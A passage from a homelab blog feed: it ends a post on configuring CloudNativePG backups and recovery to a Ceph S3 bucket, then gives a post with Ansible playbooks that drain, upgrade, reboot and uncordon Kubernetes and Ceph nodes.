</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-cnpg-backup-keycloak</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretAccessKey</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-cnpg-backup-keycloak</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">retentionPolicy</span>: <span style="color:#e6db74">&#34;90d&#34;</span>
</span></span></code></pre></div><p>This is put under <code>spec</code> in the <code>Cluster</code> manifest. This config tells
CloudNativePG how to access the S3 backup bucket, and that all data should be
retained for 90 days. This is going to be true for both, WALs and full <code>PGDATA</code>
backups.</p>
<p>After this update is made to the Cluster manifest, you might see this error
message in the logs:</p>
<pre tabindex="0"><code>&#34;error&#34;:&#34;while getting secret rook-ceph-object-user-rgw-bulk-cnpg-backup-keycloak: secrets \&#34;rook-ceph-object-use
r-rgw-bulk-cnpg-backup-keycloak\&#34; is forbidden: User \&#34;system:serviceaccount:testsetup:keycloak-pg-cluster\&#34; cannot get resource \&#34;secrets\&#34; in API group \&#34;\&#34; in the namespace \&#34;testsetup\&#34;&#34;
</code></pre><p>Don&rsquo;t be alarmed by it, it just seemed to be a transient error which went away
on its own.</p>
<p>After a couple of moments, CloudNativePG should start streaming the WALs to
the S3 bucket already. For this example, the path in the bucket looks like this:</p>
<pre tabindex="0"><code>s3://backup-cnpg/keycloak-pg-cluster/wals/
</code></pre><p>I like the fact that CloudNativePG doesn&rsquo;t just assume that the cluster has the
entire bucket to itself, but instead puts the data into a directory under the
root, allowing me to put the backups of all the clusters into the same bucket.</p>
<p>But the WALs are only part of the backup. The second part is the full <code>PGDATA</code>
backup, and that&rsquo;s done via a <a href="https://cloudnative-pg.io/documentation/current/cloudnative-pg.v1/#postgresql-cnpg-io-v1-ScheduledBackup">ScheduledBackup</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ScheduledBackup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">test-backup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">method</span>: <span style="color:#ae81ff">barmanObjectStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">immediate</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">schedule</span>: <span style="color:#e6db74">&#34;0 0 0 * * *&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backupOwnerReference</span>: <span style="color:#ae81ff">self</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cluster</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">keycloak-pg-cluster</span>
</span></span></code></pre></div><p>This runs a backup every day at exactly midnight. The <code>immediate: true</code> config
tells CloudNativePG to make a backup immediately. This is another one of those
nice little features, avoiding the typical futzing with the schedule to make
it start a backup in five minutes for testing.</p>
<h2 id="recovery">Recovery</h2>
<p>And finally, let&rsquo;s have a look at how to use the previously created backups
to create a new cluster, as an example of a post-incidence recovery operation.</p>
<p>It&rsquo;s important here that while I deleted the old Cluster completely, I left the
S3 bucket user and its associated secret. That&rsquo;s needed so CloudNativePG can use
those credentials to get at the data from the old cluster.</p>
<p>Recovery itself is pretty straightforward. Instead of adding a <code>bootstrap.initdb</code>
key, the <code>bootstrap.recovery</code> key is used, like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">instances</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">bootstrap</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">recovery</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">database</span>: <span style="color:#ae81ff">keycloak</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">keycloak</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">source</span>: <span style="color:#ae81ff">keycloak-pg-cluster</span>
</span></span></code></pre></div><p>The <code>database</code> and <code>owner</code> keys need to be set. Without them, CloudNativePG will
read in the old database from the backups, but it will also create the default
<code>app</code> database, and create new Secrets for that DB, instead of the restored <code>keycloak</code>
DB.</p>
<p>The <code>source: keycloak-pg-cluster</code> references an entry in the <code>externalClusters</code>
section, which looks almost like the <code>backup:</code> section of the original cluster&rsquo;s
config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  <span style="color:#f92672">externalClusters</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">keycloak-pg-cluster</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">barmanObjectStore</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">endpointURL</span>: <span style="color:#ae81ff">http://rook-ceph-rgw-rgw-bulk.rook-cluster.svc:80</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">destinationPath</span>: <span style="color:#e6db74">&#34;s3://backup-cnpg/&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">accessKeyId</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-cnpg-backup-keycloak</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">secretAccessKey</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-cnpg-backup-keycloak</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">key</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span></code></pre></div><p>Here again, CloudNativePG will assume that the backups are stored under the
<code>name</code> of the cluster in the bucket. The restore with this config worked without
issue and after it was done, I saw my previously created test realm and users
again in Keycloak.</p>
<h1 id="conclusion">Conclusion</h1>
<p>Phew. Okay. This setup took way longer than I had initially thought, mostly
because I almost jumped ship after the initial research and finding out that
it doesn&rsquo;t really support multi-DB clusters. And also because I ended up deciding
that I would like to get hands on with the recovery procedure before I actually
need it.</p>
<p>One of the potential downsides is that, just by virtue of running multiple
clusters, it will very likely need more resources than my current single-cluster
setup.
I&rsquo;m still not too happy with the backup, I would have preferred something closer
to restic, at least with deduplication. I will probably at least enable
compression by default at some point, to save on storage space on the S3 bucket.</p>
<p>Then again, let&rsquo;s be honest here: Complexity is sort of the goal. &#x1f913;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 7: Ansible Plays for Host Updates</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-7-node-updates/</link>
      <pubDate>Sat, 17 Feb 2024 22:45:46 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-7-node-updates/</guid>
      <description>It really needs to be automated</description>
      <content:encoded><![CDATA[<p>Wherein I add the Kubernetes nodes to my host update Ansible playbook.</p>
<p>This is part eight of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>With the number of hosts I&rsquo;ve now got in my Homelab, I definitely need a better
way to update them than manually SSH&rsquo;ing into each. So a while ago, I created
an Ansible playbook to update all hosts in my Homelab. These updates are also
one of the reasons I keep so many physical hosts, even if they&rsquo;re individually
relatively small: I want an environment where I can take down any given host
for updates without anything at all breaking, and especially without having to
take the entire lab down before a regular host update.</p>
<p>My node updates need to execute the following sequence:</p>
<ol>
<li>Drain all Pods from the node</li>
<li>Run <code>apt update</code></li>
<li>Run <code>apt upgrade</code></li>
<li>Reboot the machine</li>
<li>Uncordon the machine</li>
<li>Run <code>apt autoremove</code></li>
</ol>
<p>I&rsquo;ve got a couple of different classes of nodes in my Homelab, but I will
concentrate only on those related to k8s in this post:</p>
<ol>
<li>Control plane nodes. These run the kubeadm control plane Pods and Ceph MONs.</li>
<li>Ceph nodes. These run the Ceph OSDs providing storage to the Homelab and some
other Ceph services.</li>
<li>Worker nodes. Those run my Kubernetes workloads.</li>
</ol>
<p>All three have some alterations on the above sequence of steps. All three classes
of node have their separate play, and the plays all run in sequence, not parallel
to each other, to ensure stability of the overall cluster. I&rsquo;m reasonably sure
that with some fancy footwork, I could probably run them in parallel as well.
But the main goal of this setup is that I enter a single command, and then I
can do something completely different, without having to babysit the update.
If it takes an hour longer but I can just go and read something while it&rsquo;s
running, that&rsquo;s an okay trade-off for me. Those of you following me on Mastodon
can probably tell when my update Fridays are just by the volume of posts I make
on those evenings. &#x1f605;</p>
<p>The first difference in the playbooks for each class of node is in the parallelism
inside the playbooks. For this, I&rsquo;m using Ansible&rsquo;s <a href="https://docs.ansible.com/ansible/latest/collections/ansible/builtin/linear_strategy.html">Linear Strategy</a>.
Both the control plane and Ceph nodes run with <code>serial: 1</code>, to make sure there
are always enough nodes up to keep the Homelab chugging along.
The worker nodes on the other hand are allowed to run with <code>serial: 2</code>, updating
two hosts in parallel, as I should have enough slack in the cluster to keep at
least most things running even with two fewer nodes.</p>
<p>For draining the nodes, I initially used the <a href="https://docs.ansible.com/ansible/latest/collections/kubernetes/core/k8s_drain_module.html">k8s_drain_module</a>.
But I had a problem with that one, namely getting <code>too many requests</code> errors:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>fatal: <span style="color:#f92672">[</span>node1 -&gt; cnc<span style="color:#f92672">]</span>: FAILED! <span style="color:#f92672">=</span>&gt; <span style="color:#f92672">{</span><span style="color:#e6db74">&#34;changed&#34;</span>: false, <span style="color:#e6db74">&#34;msg&#34;</span>: <span style="color:#e6db74">&#34;Failed to delete pod rook-cluster/rook-ceph-osd-1-7977658495-nt6ps due to: Too Many Requests&#34;</span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>I didn&rsquo;t always get the error. Sometimes it just worked. And I&rsquo;m not 100% sure
what the trigger here is. After spending quite a while googling, I&rsquo;m still not
sure where those errors are even coming from. Whether it&rsquo;s the kube-apiserver
which returns them, or whether it for example has something to do with Pod
disruption budgets. I then switched to executing <code>kubectl</code> via the <a href="https://docs.ansible.com/ansible/latest/collections/ansible/builtin/command_module.html">command module</a>.
This worked without issue. The task for draining a node looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">drain node</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">argv</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/home/my_user/.local/bin/kubectl</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">drain</span>
</span></span><span style="display:flex;"><span>      - --<span style="color:#ae81ff">delete-emptydir-data=true</span>
</span></span><span style="display:flex;"><span>      - --<span style="color:#ae81ff">force=true</span>
</span></span><span style="display:flex;"><span>      - --<span style="color:#ae81ff">ignore-daemonsets=true</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#34;{{ ansible_hostname }}&#34;</span>
</span></span></code></pre></div><p>You need to supply the absolute path to the <code>kubectl</code> binary, as this runs
a command directly, not inside a shell, so no PATH extensions and the like.
I&rsquo;m also delegating this task to my Command &amp; Control host. This is the only
machine with Kubernetes certs. The <code>--delete-emptydir-data=true</code> is needed
because Cilium uses <a href="https://kubernetes.io/docs/concepts/storage/volumes/#emptydir">emptyDir</a>
for some temporary storage, and without it, the drain fails.
The same is true for <code>--force</code>, which is necessary to allow a drain on nodes
with Pods from e.g. Deployments or StatefulSets to go through. Finally, <code>--ignore-daemonsets</code>
is necessary to allow draining of DaemonSet pods, which in my case is for example
the Fluentbit log shipper.</p>
<p>The rest of the play for my worker nodes looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">kube_workers</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Update kubernetes worker nodes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">k8s-workers</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serial</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>: <span style="color:#ae81ff">linear</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pre_tasks</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">drain node</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">argv</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#ae81ff">/home/my_user/.local/bin/kubectl</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#ae81ff">drain</span>
</span></span><span style="display:flex;"><span>          - --<span style="color:#ae81ff">delete-emptydir-data=true</span>
</span></span><span style="display:flex;"><span>          - --<span style="color:#ae81ff">force=true</span>
</span></span><span style="display:flex;"><span>          - --<span style="color:#ae81ff">ignore-daemonsets=true</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;{{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">run apt upgrade</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">apt</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">install_recommends</span>: <span style="color:#66d9ef">no</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_cache</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">upgrade</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">reboot machine</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">reboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">reboot</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for the machine to accept ansible commands again</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">reboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wait_for_connection</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">clear OSD blocklist</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ceph</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>: <span style="color:#ae81ff">/home/my_user/.krew/bin/kubectl-rook_ceph --operator-namespace rook-ceph -n rook-cluster ceph osd blocklist clear</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">uncordon node</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kubernetes.core.k8s_drain</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;{{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">uncordon</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">run autoremove</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">apt</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">autoremove</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pause for one minute</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">pause</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">minutes</span>: <span style="color:#ae81ff">1</span>
</span></span></code></pre></div><p>The <code>clear OSD blocklist</code> task clears Ceph&rsquo;s client blocklist. Most of my worker
nodes don&rsquo;t have any storage of their own, and instead use netboot and a Ceph
RBD volume for their root FS. And sometimes, Ceph puts clients on a blocklist,
as I&rsquo;ve explained in more detail <a href="https://blog.mei-home.net/posts/netboot-prob-virtualbox/">here</a>.
This task clears the blocklist. I&rsquo;m also giving all my plays a pause at the end,
to afford the cluster some time to settle again before the next batch of workers
is taken down.</p>
<p>For the Ceph nodes, I need to get a little bit more involved. I start out with
pre tasks and post tasks, which set and later unset the Ceph <code>noout</code> flag. This flag tells Ceph
to not be bothered when an OSD goes down. With this flag unset, which should be
the default, Ceph would start re-balancing data between the still available OSDs
once an OSD has been out of the cluster for some time. This is useful for error
cases, but the <code>noout</code> flag can be used to tell Ceph that it&rsquo;s going to be okay.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">set osd noout</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">command</span>: <span style="color:#ae81ff">/home/my_user/.krew/bin/kubectl-rook_ceph --operator-namespace rook-ceph -n rook-cluster ceph osd set noout</span>
</span></span></code></pre></div><p>As you can see here, I&rsquo;m again delegating execution of the command to my C&amp;C host,
as no other host has the necessary k8s certs. This command also needs the absolute
path to the binary. This time, that&rsquo;s not <code>kubectl</code> itself, but instead the binary
of the <a href="https://github.com/rook/kubectl-rook-ceph">rook-ceph plugin</a>. Normally
I would call it with <code>kubectl rook-ceph ...</code>, but that does not work with the
<code>command</code> module, so I give it the absolute path.</p>
<p>The next extra, compared to the worker node play, is that I&rsquo;m actively waiting
for the Ceph OSDs to come back. This is important to make sure that I don&rsquo;t
start the updates of the next OSD node before the previous one is back up and
running, because otherwise, bad things would happen. For one thing, I&rsquo;ve got
workloads already using the Ceph storage. For another, most of my worker nodes
will use storage from Ceph for their root disks.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for OSDs to start</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ceph</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">command</span>: <span style="color:#ae81ff">/home/my_user/.krew/bin/kubectl-rook_ceph --operator-namespace rook-ceph -n rook-cluster ceph osd status &#34;{{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">register</span>: <span style="color:#ae81ff">ceph_end</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">until</span>: <span style="color:#e6db74">&#39;(ceph_end.stdout | regex_findall(&#34;.*,up.*&#34;, multiline=True) | list | length) == (ceph_end.stdout_lines | length - 1)&#39;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">retries</span>: <span style="color:#ae81ff">12</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">delay</span>: <span style="color:#ae81ff">10</span>
</span></span></code></pre></div><p>This task waits for a maximum of 120 seconds for the node&rsquo;s OSDs to come up.
The output of <code>ceph osd status</code> looks like this:</p>
<pre tabindex="0"><code>ID  HOST     USED  AVAIL  WR OPS  WR DATA  RD OPS  RD DATA  STATE      
 0  nakith   191G  7260G      0        0       0        0   exists,up  
 1  nakith   809M  1862G      4     11.1k      5       26   exists,up  
 2  neper    391M   931G      0        0       1        0   exists,up  
 3  neper    191G  3534G      0        0       0     14.2k  exists,up  
</code></pre><p>That&rsquo;s then parsed with a regex, and the number of lines with <code>up</code> in the
state is compared to the number of lines overall.
Just for completeness&rsquo; sake, here is the full Ceph play:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">kube_ceph</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Update kubernetes Ceph nodes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">k8s-ceph</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serial</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>: <span style="color:#ae81ff">linear</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pre_tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">set osd noout</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>: <span style="color:#ae81ff">/home/my_user/.krew/bin/kubectl-rook_ceph --operator-namespace rook-ceph -n rook-cluster ceph osd set noout</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">drain node</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ceph</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">argv</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#ae81ff">/home/my_user/.local/bin/kubectl</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#ae81ff">drain</span>
</span></span><span style="display:flex;"><span>          - --<span style="color:#ae81ff">delete-emptydir-data=true</span>
</span></span><span style="display:flex;"><span>          - --<span style="color:#ae81ff">force=true</span>
</span></span><span style="display:flex;"><span>          - --<span style="color:#ae81ff">ignore-daemonsets=true</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;{{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">run apt upgrade</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">apt</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">install_recommends</span>: <span style="color:#66d9ef">no</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_cache</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">upgrade</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">reboot machine</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">reboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">reboot</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for the machine to accept ansible commands again</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">reboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wait_for_connection</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">uncordon node</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kubernetes.core.k8s_drain</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;{{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">uncordon</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for OSDs to start</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ceph</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>: <span style="color:#ae81ff">/home/my_user/.krew/bin/kubectl-rook_ceph --operator-namespace rook-ceph -n rook-cluster ceph osd status &#34;{{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">register</span>: <span style="color:#ae81ff">ceph_end</span>
